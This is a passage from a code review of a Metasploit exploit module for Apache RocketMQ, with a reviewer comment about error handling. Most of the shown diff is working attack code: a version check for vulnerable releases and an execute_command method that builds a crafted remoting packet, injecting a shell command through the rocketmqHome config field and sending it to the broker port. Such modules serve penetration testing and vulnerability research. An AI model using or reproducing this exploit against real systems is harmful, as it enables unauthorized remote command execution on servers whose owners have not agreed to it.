modules/exploits/multi/http/apache_rocketmq_update_config.rb

```diff
@@ -0,0 +1,121 @@
+              'Type' => :nix_memory
+            }
+          ],
+        ],
+        'Payload' => {
+          'BadChars' => "\x27"
+        },
+        'DefaultOptions' => {
+          'WfsDelay' => 60
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-05-23',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The RocketMQ NameServer port', 9876]),
+        OptPort.new('BROKER_PORT', [false, 'The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommended)', 10911])
+      ]
+    )
+  end
+
+  def check
+    @version_request_response = send_version_request
+    @parsed_data = parse_rocketmq_data(@version_request_response)
+    return Exploit::CheckCode::Unknown('RocketMQ did not respond to the request for version information') unless @parsed_data['version']
+
+    version = Rex::Version.new(@parsed_data['version'].gsub('V', ''))
+    return Exploit::CheckCode::Unknown('Unable to determine the version') unless version
+
+    if version > Rex::Version.new('5.0.0')
+      return Exploit::CheckCode::Appears("RocketMQ version: #{version}") if version <= Rex::Version.new('5.1.0')
+    elsif version <= Rex::Version.new('4.9.5')
+      return Exploit::CheckCode::Appears("RocketMQ version: #{version}")
+    end
+    Exploit::CheckCode::Safe("RocketMQ version: #{version}")
+  end
+
+  def execute_command(cmd, opts = {})
+    data = '`{"code":25,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":395}filterServerNums=1
+rocketmqHome=' + cmd.encode('UTF-8') + "\x3b\x0a"
+    header = "\x00\x00\x00" + [data.length + 3].pack('C') + "\x00\x00\x00"
+    payload = header + data
+
+    begin
+      vprint_status("Payload command to be executed: #{cmd}")
+      sock = connect(true, { 'RHOST' => datastore['RHOST'], 'RPORT' => opts[:broker_port].to_i })
+      hex_payload_length = (payload.length - 4).to_s(16)
+      print_good("Payload length: #{hex_payload_length.to_i(16)}, (must not exceed 255 characters)")
+
+      if hex_payload_length.to_i(16) > 255
+        fail_with(Failure::BadConfig, "Payload length is too long, please shorten filenames (FETCH_FILENAME if using default fetch payload) or choose a new payload. Current payload length is #{hex_payload_length.to_i(16)} the max payload length is 255")
+      end
+      vprint_status("Payload is #{payload}")
+
+      sock.put(payload)
+    rescue Rex::ConnectionError, ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e
+      print_error("Unable to connect: #{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
```

Comment:
Maybe using `fail_with` would be more appropriate in a context of a module? Also, I'm not sure the backtrace would be useful here.
```suggestion
      fail_with(Failure::Unreachable, "Unable to connect: #{e.class} #{e.message}")
```